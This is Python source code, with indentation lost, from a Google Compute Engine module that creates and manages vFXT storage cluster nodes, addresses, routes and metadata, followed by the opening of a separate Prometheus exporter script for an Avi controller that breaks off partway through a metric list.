instance_addresses ([], optional): list of instance addresses to use (passed to create_cluster(private_ip_address))
address_range_start (str, optional): The first of a custom range of addresses to use for the cluster
address_range_end (str, optional): The last of a custom range of addresses to use for the cluster
address_range_netmask (str, optional): cluster address range netmask
Additional arguments are passed through to create_node()
Raises: vFXTConfigurationException, vFXTCreateFailure
root_image format is the image name for local images (or the more
formal global/images/my-private-image). For images from other projects,
the format is projects/<project>/global/images/<image name>. The full
URL also is accepted.
'''
if not all([cluster.mgmt_ip, cluster.mgmt_netmask, cluster.cluster_ip_start, cluster.cluster_ip_end]):
raise vFXTConfigurationException("Cluster networking configuration is incomplete")
# if using shared vpc/xpn, we cannot use routes for addressing
if self.project_id != self.network_project_id:
if not self._cidr_overlaps_network('{}/32'.format(cluster.cluster_ip_start)):
raise vFXTConfigurationException("Cluster addresses must reside within the Shared VPC address ranges")
zones = options.get('zones') or self.zones
zones = zones if isinstance(zones, list) else [zones]
# extend our service zones if necessary
for z in zones:
if z not in self.zones:
self.zones.append(z)
cluster.zones = [zones[0]] # first node zone
machine_type = cluster.machine_type
if machine_type not in self.MACHINE_TYPES:
raise vFXTConfigurationException("{} is not a valid instance type".format(machine_type))
zone_machine_types = self._zone_machine_types()
if not all(z in zone_machine_types and machine_type in zone_machine_types[z] for z in zones):
err = "{} is not available in all requested zones: {}".format(machine_type, ', '.join(zones))
raise vFXTConfigurationException(err)
machine_defs = self.MACHINE_DEFAULTS[machine_type]
cluster_size = int(options.get('size', machine_defs['node_count']))
log.info('Creating cluster configuration')
cfg = cluster.cluster_config(expiration=options.get('config_expiration', None))
log.debug("Generated cluster config: {}".format(cfg.replace(cluster.admin_password, '[redacted]')))
# gce needs them base64 encoded
cfg = base64.b64encode(cfg.encode('utf-8')).decode()
disk_type = options.get('disk_type') or machine_defs['root_disk_type']
root_image = options.get('root_image') or self._get_default_image()
data_disk_size = options.get('data_disk_size') or machine_defs['data_disk_size']
data_disk_count = options.get('data_disk_count') or machine_defs['data_disk_count']
data_disk_type = options.get('data_disk_type') or machine_defs['data_disk_type']
data_disk_nvme = options.get('data_disk_nvme', False)
metadata = options.pop('metadata', {})
instance_addresses = cluster.instance_addresses or [None] * cluster_size
# our private addresses must be inside the network ranges
if instance_addresses[0] and not self._cidr_overlaps_network('{}/32'.format(instance_addresses[0])):
log.debug("Resetting instance addresses to be provided via the backend service")
instance_addresses = [None] * cluster_size
try:
# create the initial node
name = '{}-{:02}'.format(cluster.name, 1)
opts = {'data_disk_count': data_disk_count, 'data_disk_size': data_disk_size,
'data_disk_type': data_disk_type, 'metadata': metadata.copy(),
'machine_type': machine_type, 'root_image': root_image,
'disk_type': disk_type, 'data_disk_nvme': data_disk_nvme}
options['zone'] = zones[0] # first node zone
options['private_ip_address'] = instance_addresses.pop(0)
n = self.create_node(name, cfg, node_opts=opts, instance_options=options)
cluster.nodes.append(ServiceInstance(service=self, instance=n))
threads = []
if not options.get('skip_configuration'):
t = threading.Thread(target=cluster.first_node_configuration)
t.setDaemon(True)
t.start()
threads.append(t)
options.update(opts)
options['instance_addresses'] = instance_addresses
options['zone'] = zones if len(zones) == 1 else zones[1:]
self.add_cluster_nodes(cluster, cluster_size - 1, **options)
# do a timeout join to handle KeyboardInterrupts
while any([_.is_alive() for _ in threads]):
for t in threads:
t.join(10)
if cluster.first_node_error:
raise cluster.first_node_error
except vFXTNodeExistsException as e:
log.error("Failed to create node: {}".format(e))
raise
except (KeyboardInterrupt, Exception) as e:
if not log.isEnabledFor(logging.DEBUG):
log.exception(e)
log.error("Failed to create nodes: {}".format(e))
if not options.get('skip_cleanup', False):
cluster.destroy(quick_destroy=True)
raise_from(vFXTCreateFailure(e), e)
def post_destroy_cluster(self, cluster):
'''Post cluster destroy cleanup'''
# does nothing here
def add_cluster_nodes(self, cluster, count, **options):
'''Add nodes to the cluster (delegates to create_node())
Arguments:
cluster (vFXT.cluster.Cluster): cluster object
count (int): number of nodes to add
skip_cleanup (bool, optional): do not clean up on failure
**options: passed to create_node()
Raises: exceptions from create_node()
'''
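# Minimal usage sketch (the cluster object, node count and zone names below are
# hypothetical; any extra keyword arguments are forwarded to create_node()):
#   service.add_cluster_nodes(cluster, 2, zone=['us-east1-b', 'us-east1-c'])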
if count < 1: return
zones = options.get('zone') or (cluster.zones if hasattr(cluster, 'zones') else self.zones)
zones = zones if isinstance(zones, list) else [zones]
# make sure to use unused zones first, but account for our cluster zones
zones.extend([z for z in cluster.zones if z not in zones])
cycle_zones = cycle(zones)
instance_addresses = options.pop('instance_addresses', [None] * count)
if len(instance_addresses) != count:
raise vFXTConfigurationException("Not enough instance addresses provided, require {}".format(count))
if instance_addresses[0] and not self._cidr_overlaps_network('{}/32'.format(instance_addresses[0])):
log.debug("Resetting instance addresses to be provided via the backend service")
instance_addresses = [None] * count
# look at cluster.nodes[0].instance
instance = cluster.nodes[0].instance
instance_zone = instance['zone'].split('/')[-1]
disks = instance['disks']
root_disk = [d for d in disks if 'boot' in d and d['boot']][0]
non_root_disks = [d for d in disks if 'boot' not in d or not d['boot']]
data_disk_count = options.get('data_disk_count', len(non_root_disks))
if data_disk_count == 0:
raise vFXTConfigurationException("Cannot determine data disk configuration")
if 'items' in instance['tags'] and not options.get('tags'):
options['tags'] = instance['tags']['items']
if instance.get('serviceAccounts') and 'email' in instance['serviceAccounts'][0] and 'service_account' not in options:
options['service_account'] = instance['serviceAccounts'][0]['email']
metadata = {opt['key']: opt['value'] for opt in instance['metadata']['items']}
# overrides
opts = {'data_disk_count': data_disk_count, 'metadata': metadata, 'machine_type': cluster.machine_type}
overrides = ['machine_type', 'data_disk_size', 'data_disk_type', 'root_image', 'disk_type']
for o in overrides:
if o in options:
opts[o] = options.pop(o)
if 'metadata' in options: # even if empty
opts['metadata'].update(options.pop('metadata') or {})
conn = None
# root disk info
if 'root_image' not in opts or 'disk_type' not in opts:
conn = self.connection()
disk_name = root_disk['source'].split('/')[-1]
disk_data = _gce_do(conn.disks().get, project=self.project_id, zone=instance_zone, disk=disk_name)
disk_type = disk_data['type'].split('/')[-1]
root_image = disk_data['sourceImage'] if 'sourceImage' in disk_data else self._get_default_image()
if 'root_image' not in opts:
opts['root_image'] = root_image
if 'disk_type' not in opts:
opts['disk_type'] = disk_type
# data info
if 'data_disk_size' not in opts or 'data_disk_type' not in opts:
data_disk_size = None
data_disk_type = None
if not conn:
conn = self.connection()
if non_root_disks[0]['type'] == 'SCRATCH':
data_disk_type = _gce_do(conn.diskTypes().get, project=self.project_id, zone=instance_zone, diskType='local-ssd')['selfLink'].split('/')[-1]
# there is no API to query the size of a non-persistent (local-ssd) disk
data_disk_size = 375
else:
disk_name = non_root_disks[0]['source'].split('/')[-1]
disk_data = _gce_do(conn.disks().get, project=self.project_id, zone=instance_zone, disk=disk_name)
data_disk_size = disk_data['sizeGb']
data_disk_type = disk_data['type'].split('/')[-1]
if 'data_disk_size' not in opts:
opts['data_disk_size'] = data_disk_size
if 'data_disk_type' not in opts:
opts['data_disk_type'] = data_disk_type
# Requires cluster be online
# XXX assume our node name always ends in the node number
max_node_num = max([int(i.name().split('-')[-1]) for i in cluster.nodes])
joincfg = cluster.cluster_config(joining=True, expiration=options.get('config_expiration', None))
joincfg = base64.b64encode(joincfg.encode('utf-8')).decode()
nodeq = Queue.Queue()
failq = Queue.Queue()
threads = []
def cb(nodenum, inst_opts, nodeq, failq):
'''callback'''
try:
name = '{}-{:02}'.format(cluster.name, nodenum)
n = self.create_node(name, joincfg, node_opts=opts, instance_options=inst_opts)
nodeq.put(n)
except Exception as e:
if not log.isEnabledFor(logging.DEBUG):
log.exception(e)
failq.put(e)
for node_num in range(max_node_num, max_node_num + count):
next_node_num = node_num + 1
inst_opts = options.copy()
inst_opts['zone'] = next(cycle_zones)
inst_opts['private_ip_address'] = instance_addresses.pop(0)
t = threading.Thread(target=cb, args=(next_node_num, inst_opts, nodeq, failq,))
t.setDaemon(True)
t.start()
threads.append(t)
for t in threads:
t.join()
nodes = []
while True:
try:
n = nodeq.get_nowait()
nodes.append(ServiceInstance(service=self, instance=n))
except Queue.Empty:
break
failed = []
while True:
try:
failed.append(failq.get_nowait())
except Queue.Empty:
break
if failed:
if not options.get('skip_cleanup', False):
for n in nodes:
n.destroy()
raise Exception(failed)
cluster.nodes.extend(nodes)
def load_cluster_information(self, cluster, **options):
'''Loads cluster information from the service and cluster itself
'''
xmlrpc = cluster.xmlrpc()
# make sure mgmt_ip is set to the valid address (in case we used
# a node address to get in)
cluster.mgmt_ip = xmlrpc.cluster.get()['mgmtIP']['IP']
node_ips = {n['primaryClusterIP']['IP']
for name in xmlrpc.node.list()
for n in [xmlrpc.node.get(name)[name]]
if 'primaryClusterIP' in n}
# look up nodes that have one of our primary IP addresses
nodes = []
for node_ip in node_ips:
node = self._who_has_ip(node_ip)
if node:
nodes.append(node)
if nodes:
cluster.nodes = [ServiceInstance(self, instance=n) for n in nodes]
cluster.zones = list({node['zone'].split('/')[-1] for node in nodes})
# XXX assume all instances have the same settings
n = nodes[0]
cluster.machine_type = n['machineType'].split('/')[-1]
cluster.project_id = n['zone'].split('/')[-3]
cluster.network_project_id = self._get_network_project()
cluster.network_id = n['networkInterfaces'][0]['network'].split('/')[-1]
cluster.name = self.CLUSTER_NODE_NAME_RE.search(cluster.nodes[0].name()).groups()[0]
# gce specific
def _get_network(self):
'''Get the network object'''
conn = self.connection()
return _gce_do(conn.networks().get, project=self.network_project_id, network=self.network_id)
def _get_subnetworks(self, region=None):
'''Get the subnetworks from the network object
Arguments:
region (str, optional): return only the subnetworks in the provided region
'''
network_data = self._get_network()
if 'subnetworks' not in network_data:
return []
subnetworks = []
conn = self.connection()
for sn in network_data['subnetworks']:
sn_region = sn.split('/')[-3]
sn_name = sn.split('/')[-1]
# This lookup can fail: the network may list subnetworks that are hidden
# from us, e.g. ones managed on the customer's behalf for serverless
# services, so tolerate errors and skip those entries.
try:
subnetwork = _gce_do(conn.subnetworks().get,
project=self.network_project_id,
region=sn_region, subnetwork=sn_name)
subnetworks.append(subnetwork)
except Exception as e:
log.error(e)
if region:
subnetworks = [_ for _ in subnetworks if _['region'].endswith(region)]
return subnetworks
def _get_metadata(self, instance, key):
'''Retrieve the value of a key from the instance metadata
Arguments:
instance (obj): backend instance object
key (str): key to lookup
Returns: value or None
'''
if 'items' not in instance['metadata']:
return None
items = instance['metadata']['items']
try:
value = [i['value'] for i in items if i['key'] == key][0]
log.debug("Fetched metadata {}={}".format(key, value))
return value
except Exception:
log.debug("No such metadata key:{}".format(key))
return None
def _delete_metadata(self, instance, key):
'''Delete a key from the instance metadata and sync with the backend
Arguments:
instance (obj): backend instance object
key (str): key to delete
'''
if 'items' not in instance['metadata']:
return
conn = self.connection()
metadata = instance['metadata']
zone = instance['zone'].split('/')[-1]
items = metadata['items']
existing = [idx for idx, i in enumerate(items) if i['key'] == key]
if existing:
del metadata['items'][existing[0]]
response = _gce_do(conn.instances().setMetadata,
project=self.project_id,
zone=zone,
instance=instance['name'],
body=metadata)
self._wait_for_operation(response, msg='metadata to be deleted', zone=zone)
def _set_metadata(self, instance, key, value):
'''Set a key from the instance metadata and sync with the backend
Arguments:
instance (obj): backend instance object
key (str): key to set
value (str): value of key
'''
if 'items' not in instance['metadata']:
instance['metadata']['items'] = []
conn = self.connection()
zone = instance['zone'].split('/')[-1]
metadata = instance['metadata']
items = metadata['items']
existing = [(idx, i['value']) for idx, i in enumerate(items) if i['key'] == key]
if existing:
idx, oldvalue = existing[0]
metadata['items'][idx]['value'] = value
log.debug("Updated metadata key:{}={} (from {})".format(key, value, oldvalue))
else:
metadata['items'].append(dict(key=key, value=value))
log.debug("Setting metadata key:{}={}".format(key, value))
response = _gce_do(conn.instances().setMetadata,
project=self.project_id,
zone=zone,
instance=instance['name'],
body=metadata)
self._wait_for_operation(response, msg='metadata to be set', zone=zone)
def valid_bucketname(self, name):
'''Validate the bucket name
Returns: bool
'''
if not ServiceBase.valid_bucketname(self, name):
return False
if name.startswith('goog'):
return False
disallowed = ['google', 'gogle', 'googgle', 'g00gle', 'goog1e']
if all([s not in name for s in disallowed]):
return True
return False
def valid_instancename(self, name):
'''Validate the instance name
Returns: bool
'''
if not ServiceBase.valid_instancename(self, name):
return False
if not name or len(name) > 63:
return False
if self.INSTANCENAME_RE.match(name):
return True
return False
def _zone_machine_types(self):
'''Get a mapping of zones and their supported machine types
Returns: dict zone:[types]
'''
response = _gce_do(self.connection().machineTypes().aggregatedList, project=self.project_id)
return {zone_name.split('/')[1]: [mt['name'] for mt in zone_data.get('machineTypes', [])] for zone_name, zone_data in response['items'].items()}
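# The returned mapping is keyed by zone name, e.g. (illustrative values only):
#   {'us-east1-b': ['n1-standard-4', 'n1-highmem-8', ...], 'us-east1-c': [...]}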
def _zone_names(self, all_regions=True):
'''Get a list of zone names
Arguments:
all_regions (bool, optional): return zones for all regions (defaults to True)
Returns: list
'''
if not hasattr(self.local, '_zone_names'):
conn = self.connection()
self.local._zone_names = list(self.zones)
regions = _gce_do(conn.regions().list, project=self.project_id)['items']
all_zones = [zone.split('/')[-1] for region in regions if 'zones' in region for zone in region['zones']]
self.local._zone_names.extend([_ for _ in all_zones if _ not in self.zones])
if all_regions:
return self.local._zone_names
else:
region = self._zone_to_region(self.zones[0])
return [_ for _ in self.local._zone_names if _.startswith(region)]
def _zone_to_region(self, zone):
'''Return the name of the region for a given zone
This is typically just zone[:-2]
Arguments:
zone (str): name of the zone
'''
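# For example (illustrative zone name), 'us-east1-b' resolves to region
# 'us-east1', matching the zone[:-2] convention noted above.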
conn = self.connection()
regions = _gce_do(conn.regions().list, project=self.project_id)['items']
for r in regions:
zone_url = '{}/{}/zones/{}'.format(self.GCE_URL, self.project_id, zone)
if zone_url in r.get('zones', []):
return r['name']
raise vFXTConfigurationException("Invalid zone: {}".format(zone))
def _gs_get_object(self, bucket, obj, fh, chunksize=1024 * 1024):
'''Fetch an object from a bucket
Arguments:
bucket (str): bucket name
obj (str): object name
fh: filehandle (any io.IOBase derived filehandle, even StringIO)
chunksize: size of download chunks
'''
log.debug("Fetching {} from bucket {}".format(obj, bucket))
c = self.connection(connection_type='storage')
req = c.objects().get_media(bucket=bucket, object=obj)
downloader = googleapiclient.http.MediaIoBaseDownload(fh, req, chunksize)
done = False
errors = 0
while not done:
try:
status, done = downloader.next_chunk()
if status:
log.debug("{:>3}% of {} downloaded".format(status.progress() * 100, obj))
except googleapiclient.http.HttpError as e:
if int(e.resp['status']) < 500:
raise_from(vFXTServiceFailure("Failed to fetch object {}: {}".format(obj, e)), e)
errors += 1
time.sleep(backoff(errors))
except Exception as e:
errors += 1
time.sleep(backoff(errors))
def _gs_fetch(self, url, filename):
'''Retrieve the object from google storage, writing it to the passed in file location
Arguments:
url (str): gs:// url
filename (str): name of destination file (absolute path)
Returns: Nothing
Raises:
googleapiclient.errors.HttpError
'''
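# Parsing example (hypothetical URL): 'gs://my-bucket/images/node.tgz' yields
# bkt='my-bucket' and obj='images/node.tgz' via GSURL_RE below.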
bkt = None
obj = None
log.debug("Fetching {} to {}".format(url, filename))
try:
m = self.GSURL_RE.match(url)
if not m:
raise Exception('Match failed')
bkt = m.groups()[0]
obj = m.groups()[1]
if not (bkt and obj):
raise Exception('Failed to parse both bucket and object')
except Exception as e:
log.debug("Failed parsing google storage url: {}".format(e))
raise_from(vFXTConfigurationException("Invalid google storage URL: {}".format(url)), e)
sig_file = filename + '.sig'
sig_obj = obj + '.sig'
try:
# does sig exist
if os.access(sig_file, os.F_OK) and os.access(filename, os.F_OK):
tmp = sig_file + '.tmp'
with open(tmp, 'wb') as f:
self._gs_get_object(bkt, sig_obj, f)
sig_cmp = filecmp.cmp(sig_file, tmp)
os.unlink(tmp)
if sig_cmp: # we got it
log.debug("Signature {} up to date".format(sig_obj))
return # bail, nothing to be done
except googleapiclient.errors.HttpError:
pass
# fetch sig for future comparison
try:
with open(sig_file, 'wb') as f:
self._gs_get_object(bkt, sig_obj, f)
except Exception as e:
log.debug(e)
try:
os.unlink(sig_file)
except Exception as cleanup_e:
log.debug("Failed to cleanup {}: {}".format(sig_file, cleanup_e))
# get the actual file
try:
with open(filename, 'wb') as f:
self._gs_get_object(bkt, obj, f)
except Exception as e:
log.debug(e)
try:
os.unlink(filename)
except Exception as cleanup_e:
log.debug("Failed to cleanup {}: {}".format(filename, cleanup_e))
raise
def _destroy_installation_image(self, image):
'''Destroy an installation image
Arguments:
image (str): name of the cloud image
'''
log.info("Destroying image {}".format(image))
try:
r = _gce_do(self.connection().images().delete, project=self.project_id, image=image)
self._wait_for_operation(r, msg='image to be deleted', op_type='globalOperations')
except Exception as e:
raise_from(vFXTServiceFailure("Failed to destroy image {}: {}".format(image, e)), e)
def add_instance_address(self, instance, address, **options):
'''Add a new route to the instance
Arguments:
instance: backend instance
address (str): IP address
allow_reassignment (bool, optional): defaults to True
priority (int, optional): priority (lower value is higher), defaults to 900
'''
conn = self.connection()
addr = Cidr('{}/32'.format(address)) # validates
dest = '{}/32'.format(addr.address)
zone = instance['zone'].split('/')[-1]
network = self._get_network()
try:
# need to check network/subnetwork ranges, if this address falls within those ranges
# we can use the ip alias feature... otherwise we fall back to the route approach.
ipalias_ranges = []
subnetwork = None
if self.subnetwork_id:
subnetwork = self._get_subnetwork(self.subnetwork_id)
if not subnetwork:
subnetwork_region = self._zone_to_region(zone)
subnetworks = self._get_subnetworks(subnetwork_region)
if subnetworks: # no subnetwork specified, but we have them so use one
subnetwork = subnetworks[0]
if subnetwork:
if 'ipCidrRange' in subnetwork:
ipalias_ranges.append(subnetwork.get('ipCidrRange'))
for subrange in subnetwork.get('secondaryIpRanges', []):
if 'ipCidrRange' in subrange:
ipalias_ranges.append(subrange.get('ipCidrRange'))
if any([Cidr(_).contains(address) for _ in ipalias_ranges]):
nic = instance['networkInterfaces'][0] # XXX only care about the first iface
aliases = nic.get('aliasIpRanges', [])
if dest in [_['ipCidrRange'] for _ in aliases]:
raise vFXTConfigurationException("Address already assigned: {}".format(address))
aliases.append({'ipCidrRange': dest})
nic['aliasIpRanges'] = aliases
other_instance = self._who_has_ip(address)
if other_instance:
log.debug("{} has {}, removing".format(other_instance['name'], address))
self.remove_instance_address(other_instance, address)
log.debug('Adding instance address body {}'.format(nic))
resp = _gce_do(conn.instances().updateNetworkInterface, instance=instance['name'], project=self.project_id, zone=zone, networkInterface=nic['name'], body=nic)
self._wait_for_operation(resp, msg='IP Alias configuration', zone=zone)
else: # XXX or fall back to routes
# check for existing
dest_filter = 'destRange eq {}'.format(dest)
resp = _gce_do(conn.routes().list, project=self.network_project_id, filter=dest_filter)
if 'items' in resp:
existing = resp['items']
network_selflink = network['selfLink']
# if we are the next hop instance for a route in our current network
if instance['selfLink'] in [_['nextHopInstance'] for _ in existing if _['network'] == network_selflink and 'nextHopInstance' in _]:
raise vFXTConfigurationException("Instance already has a route for this address: {}".format(dest))
if not options.get('allow_reassignment', True):
raise vFXTConfigurationException("Route already assigned: {}".format(existing))
for route in existing:
log.debug("Deleting route {}".format(route['name']))
resp = _gce_do(conn.routes().delete, project=self.network_project_id, route=route['name'])
self._wait_for_operation(resp, msg='route to be deleted', op_type='globalOperations')
# add the route
body = {
'name': '{}-{}'.format(self.name(instance), addr.address.replace('.', '-')),
'network': network['selfLink'],
'nextHopInstance': instance['selfLink'],
'destRange': dest,
'priority': options.get('priority') or 900,
}
log.debug('Adding instance address body {}'.format(body))
resp = _gce_do(conn.routes().insert, project=self.network_project_id, body=body)
self._wait_for_operation(resp, msg='route to be created', op_type='globalOperations')
except vFXTConfigurationException as e:
raise
except Exception as e:
raise_from(vFXTServiceFailure("Failed to add address: {}".format(e)), e)
def remove_instance_address(self, instance, address):
'''Remove an instance route address
Arguments:
instance: backend instance
address (str): IP address
Raises: vFXTServiceFailure
'''
conn = self.connection()
addr = Cidr('{}/32'.format(address)) # validates
dest = '{}/32'.format(addr.address)
zone = instance['zone'].split('/')[-1]
try:
nic = instance['networkInterfaces'][0]
aliases = nic.get('aliasIpRanges', [])
if dest not in [_['ipCidrRange'] for _ in nic.get('aliasIpRanges', [])]:
# XXX or fall back on routes
expr = 'destRange eq {}'.format(dest)
routes = _gce_do(conn.routes().list, project=self.network_project_id, filter=expr)
if not routes or 'items' not in routes:
#raise vFXTConfigurationException("No route was found for {}".format(addr.address))
raise vFXTConfigurationException("Address not assigned via routes: {}".format(address))
for route in routes['items']:
if instance['selfLink'] != route['nextHopInstance']:
log.warning("Skipping route destined for other host: {} -> {}".format(address, route['nextHopInstance']))
continue
log.debug("Deleting route {}".format(route['name']))
resp = _gce_do(conn.routes().delete, project=self.network_project_id, route=route['name'])
self._wait_for_operation(resp, msg='route to be deleted', op_type='globalOperations')
return
# prune the ip aliases
nic['aliasIpRanges'] = [_ for _ in aliases if _['ipCidrRange'] != dest]
resp = _gce_do(conn.instances().updateNetworkInterface, instance=instance['name'], project=self.project_id, zone=zone, networkInterface=nic['name'], body=nic)
self._wait_for_operation(resp, msg='IP Alias configuration', zone=zone)
except vFXTConfigurationException as e:
raise
except Exception as e:
raise_from(vFXTServiceFailure("Failed to remove address: {}".format(e)), e)
def instance_in_use_addresses(self, instance, category='all'):
'''Get the in use addresses for the instance
Arguments:
instance: backend instance
category (str): all, instance, routes
To obtain the public instance address, use 'public' category. This
is not included with 'all'.
'''
addresses = set()
if category in ['all', 'instance']:
for interface in instance['networkInterfaces']:
interface_address = interface.get('networkIP')
if interface_address:
addresses.add(interface_address)
if 'aliasIpRanges' in interface:
ip_aliases = interface.get('aliasIpRanges')
for ip_alias in ip_aliases:
# we don't need to support ranges here... that just means they are auto assigned
# and not a specific address
# addresses.update(set(Cidr.expand_address_range(cidr_alias.start_address(), cidr_alias.end_address())))
if '/' in ip_alias['ipCidrRange'] and ip_alias['ipCidrRange'].split('/')[-1] != '32':
continue
addresses.add(ip_alias['ipCidrRange'].split('/')[0])
if category in ['all', 'routes']:
search = 'nextHopInstance eq .*/{}'.format(instance['name'])
conn = self.connection()
resp = _gce_do(conn.routes().list, project=self.network_project_id, filter=search)
if resp and 'items' in resp:
network_selflink = self._get_network()['selfLink']
for route in resp['items']:
addr = route['destRange'].split('/')[0]
if addr == '0.0.0.0': # gw/default
continue
# if this route is for a different network, ignore it
if route['network'] != network_selflink:
continue
addresses.add(addr)
# for special requests
if category == 'public':
for interface in instance['networkInterfaces']:
try:
nat_addresses = [_['natIP'] for _ in interface['accessConfigs']]
addresses.update(set(nat_addresses))
except Exception:
pass
return list(addresses)
def _add_tag(self, instance, tag):
'''Add a tag to an instance
'''
conn = self.connection()
zone = instance['zone'].split('/')[-1]
instance = self.refresh(instance)
tags = instance['tags']
if 'items' not in tags:
tags['items'] = []
tags['items'].append(tag)
response = _gce_do(conn.instances().setTags,
project=self.project_id,
zone=zone,
instance=instance['name'],
body=tags)
self._wait_for_operation(response, msg='tags to be set', zone=zone)
def _remove_tag(self, instance, tag):
'''Remove a tag from an instance
'''
conn = self.connection()
zone = instance['zone'].split('/')[-1]
instance = self.refresh(instance)
tags = instance['tags']
if 'items' not in tags:
tags['items'] = []
if tag not in tags['items']:
return
tags['items'] = [_ for _ in tags['items'] if _ != tag]
response = _gce_do(conn.instances().setTags,
project=self.project_id,
zone=zone,
instance=instance['name'],
body=tags)
self._wait_for_operation(response, msg='tags to be set', zone=zone)
def _cache_to_disk_config(self, cache_size, machine_type=None, disk_type=None): #pylint: disable=unused-argument
'''For a given cache size, output the default data disk count and size
Arguments:
cache_size (int): vFXT cluster node cache size in GB
machine_type (str, optional): vFXT cluster node machine type
disk_type (str, optional): vFXT cluster node disk type
Returns:
tuple (disk count, size per disk)
'''
if disk_type == 'local-ssd':
if cache_size > 3000: # 375GB max 8 disks
raise vFXTConfigurationException("{} is larger than 3000GB, the maximum size for local-ssd disks".format(cache_size))
count = int(cache_size / 375)
if (cache_size % 375) != 0:
count += 1
return (count, 375)
return tuple([1, cache_size])
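# Worked examples (illustrative): a 1000GB cache on 'local-ssd' yields
# (3, 375) since local-ssd disks are fixed at 375GB, while 1000GB on any
# persistent disk type yields (1, 1000).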
def _get_default_image(self):
'''Get the default image from the defaults
This may not be available if we are unable to fetch the defaults.
'''
try:
return self.defaults['machineimages']['current']
except Exception:
raise vFXTConfigurationException("You must provide a root disk image.")
def _disable_disk_auto_delete(self, instance, disk_name):
'''Disable disk auto delete flag
Arguments:
instance: backend instance
disk_name (str): disk name
'''
conn = self.connection()
instance_zone = instance['zone'].split('/')[-1]
op = _gce_do(conn.instances().setDiskAutoDelete,
project=self.project_id,
zone=instance_zone,
instance=instance['name'],
deviceName=disk_name,
autoDelete=False)
self._wait_for_operation(op, msg='auto delete attribute to be disabled', zone=instance_zone)
def _get_subnetwork(self, subnetwork): #pylint: disable=inconsistent-return-statements
'''Get the labeled subnetwork
Arguments:
subnetwork (str): subnetwork identifier
This must be in one of the following forms:
"foo"
"projects/project-foo/regions/us-east1/subnetworks/foo"
'''
if not subnetwork:
raise vFXTConfigurationException("You must specify a subnetwork name")
parts = subnetwork.split('/')
if len(parts) not in [1, 6]:
raise vFXTConfigurationException("Invalid subnetwork name: {}".format(subnetwork))
conn = self.connection()
try:
if len(parts) == 1:
subnetwork_region = self._zone_to_region(self.zones[0])
subnetworks = [_ for _ in self._get_subnetworks(subnetwork_region) if _['name'] == subnetwork]
if not subnetworks:
raise Exception('No such subnetwork')
return subnetworks[0]
elif len(parts) == 6:
project = parts[1]
region = parts[3]
name = parts[5]
return _gce_do(conn.subnetworks().get, project=project, region=region, subnetwork=name)
else:
raise Exception("Unknown subnetwork configuration")
except Exception as e:
log.debug("Failed to find subnetwork {}: {}".format(subnetwork, e))
raise_from(vFXTConfigurationException("Failed to find subnetwork {}: {}".format(subnetwork, e)), e)
def _who_has_ip(self, address):
'''Helper to determine which instance owns a particular IP address
'''
conn = self.connection()
# NOTE this has to iterate through all of the instances and examine the network interface
# ip addresses (or associated routes if the address does not fall within the
# network). Awaiting a better API for this, see
# https://issuetracker.google.com/issues/35905011
# https://issuetracker.google.com/issues/73455339
# limit the lookup to instance addresses when the address falls within the network; otherwise also query routes ('all')
category = 'instance' if self._cidr_overlaps_network('{}/32'.format(address)) else 'all'
# look in all zones in the current region, starting with our current zones
zones = list(self.zones)
for zone in self._zone_names(all_regions=False):
if zone not in zones:
zones.append(zone)
for zone in zones:
page_token = None
while True:
try:
r = _gce_do(conn.instances().list, project=self.project_id, zone=zone, pageToken=page_token)
if not r or 'items' not in r:
break
for instance in r['items']:
if address in self.instance_in_use_addresses(instance, category):
return instance
page_token = r.get('nextPageToken')
if not page_token:
break
except Exception as e:
log.debug("_who_has_ip instance fetch failed: {}".format(e))
break
return None
def _get_network_project(self):
if self.project_id:
xpn_project = _gce_do(self.connection().projects().getXpnHost, project=self.project_id).get('name')
if xpn_project:
log.debug("Using {} for network project".format(xpn_project))
return xpn_project
return self.project_id
else:
return None
def _gce_do(f, retries=ServiceBase.CLOUD_API_RETRIES, **options):
'''GCE function call wrapper with variable retries
Arguments:
f (function): function to call
retries (int, optional): number of retries
**options: options to pass to the function
Returns: Returns the function call
Raises: vFXTServiceFailure, vFXTServiceTimeout
'''
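# Typical call pattern used throughout this module (the parameters shown are
# placeholders):
#   _gce_do(conn.instances().get, project=project_id, zone='us-east1-b', instance='cluster-01')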
errors = 0
while True:
try:
return f(**options).execute()
except googleapiclient.errors.HttpError as e:
if int(e.resp['status']) < 500:
raise_from(vFXTServiceFailure(e), e)
errors += 1
time.sleep(backoff(errors))
retries -= 1
if retries == 0:
raise_from(vFXTServiceTimeout('{} failed, exhausted retries: {}'.format(f.__name__, e)), e)
except Exception as e:
log.debug("Unknown GCE retry-able function call failure: {}".format(e))
retries -= 1
if retries == 0:
raise vFXTServiceTimeout('{} failed, exhausted retries: {}'.format(f.__name__, e))
time.sleep(Service.POLLTIME)
|
prometheus_exporter.py
|
import json, requests, urllib3
from flask import Flask, request, jsonify
from datetime import datetime
import time
import traceback
import os
import redis
import cPickle as pickle
import virtualservice_static
import serviceengine_static
import servicediscovery
import pool_static
import controller_static
from multiprocessing import Process
if hasattr(requests.packages.urllib3, 'disable_warnings'):
requests.packages.urllib3.disable_warnings()
if hasattr(urllib3, 'disable_warnings'):
urllib3.disable_warnings()
#------------------------------------
avi_controller = os.environ['AVICONTROLLER']
avi_user = os.environ['AVIUSER']
avi_pass = os.environ['AVIPASSWORD']
#------------------------------------
#----- entity lists greater than this value will be replaced with wildcard
#----- interval in seconds to refresh the metrics cache
if 'EN_METRIC_REFRESH_INTERVAL' in os.environ:
metric_refresh_interval = int(os.environ['EN_METRIC_REFRESH_INTERVAL'])
if metric_refresh_interval < 60:
metric_refresh_interval = 60
else:
metric_refresh_interval = 300
#----- When refreshing the cache: if wait is True, the cache is refreshed before metrics are returned;
#----- if wait is False, metrics from the current cache are returned and the cache is refreshed afterwards.
#----- Set to False for very large configurations that time out while the cache is being refreshed.
if 'EN_WAIT_FOR_CACHE' in os.environ:
wait_for_cache = os.environ['EN_WAIT_FOR_CACHE'].lower()
if 'false' in wait_for_cache:
wait_for_cache = False
else:
wait_for_cache = True
else:
wait_for_cache = True
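#----- Example environment for the variables read above (values are placeholders):
#-----   AVICONTROLLER=10.0.0.10  AVIUSER=admin  AVIPASSWORD=<password>
#-----   EN_METRIC_REFRESH_INTERVAL=300  EN_WAIT_FOR_CACHE=True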
#------------------------------------
#----- Default List of Metrics for each entity type
default_vs_metric_list = [
'l4_client.apdexc',
'l4_client.avg_bandwidth',
'l4_client.avg_application_dos_attacks',
'l4_client.avg_complete_conns',
'l4_client.avg_connections_dropped',
'l4_client.avg_new_established_conns',
'l4_client.avg_policy_drops',
'l4_client.avg_rx_pkts',
'l4_client.avg_tx_pkts',
'l4_client.avg_rx_bytes',
